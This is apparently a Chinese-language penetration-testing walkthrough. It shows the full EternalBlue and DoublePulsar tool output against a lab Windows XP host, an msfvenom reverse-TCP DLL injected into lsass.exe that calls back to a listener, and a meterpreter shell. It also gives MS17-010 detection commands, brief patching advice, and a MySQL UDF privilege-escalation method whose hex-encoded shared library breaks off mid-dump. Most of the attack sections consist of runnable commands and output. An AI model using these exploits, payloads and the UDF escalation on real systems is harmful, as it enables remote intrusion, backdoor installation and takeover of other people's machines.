   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                XP

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 00              Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
    [+] Allocation total: 0xfff4
    [+] Spray size: 0
    [+] Allocation total: 0x1ffe8
    [+] Spray size: 1
    [+] Allocation total: 0x2ffdc
    [+] Spray size: 2
    [+] Allocation total: 0x3ffd0
    [+] Spray size: 3
    [+] Allocation total: 0x4ffc4
    [+] Spray size: 4
    [+] Allocation total: 0x5ffb8
    [+] Spray size: 5
    [+] Allocation total: 0x6ffac
    [+] Spray size: 6
    [+] Allocation total: 0x7ffa0
    [+] Spray size: 7
    [+] Allocation total: 0x8ff94
    [+] Spray size: 8
    [+] Allocation total: 0x9ff88
    [+] Spray size: 9
    [+] Allocation total: 0xaff7c
    [+] Spray size: 10
    [+] Allocation total: 0xbff70
    [+] Spray size: 11
    [+] Quota NOT exceeded after 12 packets
    [+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending 2 non-paged pool fragment packets
        ....DONE.
    [+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
    [+] Sending 10 non-paged pool grooming packets
        ..........DONE.
    [+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

攻击成功之后并不能直接执行命令,需要用框架的其他的插件配合。可以使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。
Ping: 检测后门是否部署成功
RUNDLL:注入dll。
RunShellcode:注入shellcode
Uninstall:用于卸载系统上的后门
测试使用RUNDLL来注入之前msf生成的dll到目标系统
使用msf生成DLL

root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.128 LPORT=2345 -f dll > s.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes

然后msf开启监听

 # msfconsole
msf > use exploit/multi/handler
msf > set LHOST 172.16.100.128
msf > set LPORT 2345
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit

fb Payload (Doublepulsar) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Function ()
[-] Skipping 'Function'

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on d
isk.
    1) Ping              Test for presence of backdoor
   *2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [2] : 2

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [C:\s.dll] : C:\s.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call


[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x0372FB2
5
    SMB Connection string is: Windows 5.1
    Target OS is: XP x86
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

反弹获得meterpeter

meterpreter > sysinfo
Computer        : VINCENT-3B49409
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

MSF


https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
拷贝到/usr/share/metasploit-framework/modules/auxiliary/scanner/smb

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 172.16.100.176
rhosts => 172.16.100.176
msf auxiliary(smb_ms17_010) > exploit 
[*] 172.16.100.176:445 - Connected to \\172.16.100.176\IPC$ with TID = 2048
[*] 172.16.100.176:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 172.16.100.176:445 - Host is likely VULNERABLE to MS17-010!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap


smb-vuln-ms17-010检测脚本:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/smb-vuln-ms17-010.nse

root@kali:/usr/share/nmap/scripts# nmap -p 445 --script=smb-vuln-ms17-010 192.168.190.46

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-27 11:41 CST
Nmap scan report for 192.168.190.46
Host is up (0.00054s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| 
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

中招检测


需要有Python环境,需要安装argparse包

C:\doublepulsar-detection-script-master>python detect_doublepulsar.py --ip 172.16.100.176
[+] [172.16.100.176] DOUBLEPULSAR DETECTED!!!

修复方案


1)升级到微软提供支持的Windows版本,并安装最新补丁,配置自动更新。
2)无补丁的版本如Windows 2003 和 Windows XP关闭135、137、139、445端口,对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
3)安装杀毒软件

参考文章


http://bobao.360.cn/news/detail/4118.html
http://bobao.360.cn/learning/detail/3743.html
http://www.freebuf.com/sectool/132076.html
http://bobao.360.cn/news/detail/4119.html

Mysql udf提权(Linux平台)

UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限
网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的lib_mysqludf_sys.so_文件,但是测试中发现会报错

mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno: 22 /usr/lib64/mysql/plugin/udf.so: invalid ELF header)

下载lib_mysqludf_sys程序:https://github.com/mysqludf/lib_mysqludf_sys
解压文件,在源码目录里编译源代码:

gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so

注意:在编译源码时,可能会出现如下错误

In file included from lib_mysqludf_sys.c:40:
/usr/include/mysql/my_global.h:626:25: error: my_compiler.h: No such file or directory

这是一个mysql的bug引起的错误,只要修改/usr/include/mysql/my_global.h文件,注释掉626行重新编译就可以了。
生成文件lib_mysqludf_sys.so后,使用Hex.hta获取16进制

mysql> show variables like '%plugin%';
+---------------+-------------------------+
| Variable_name | Value                   |
+---------------+-------------------------+
| plugin_dir    | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)

mysql> select * from func; #检查是否已经有人导出过了
mysql> select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F64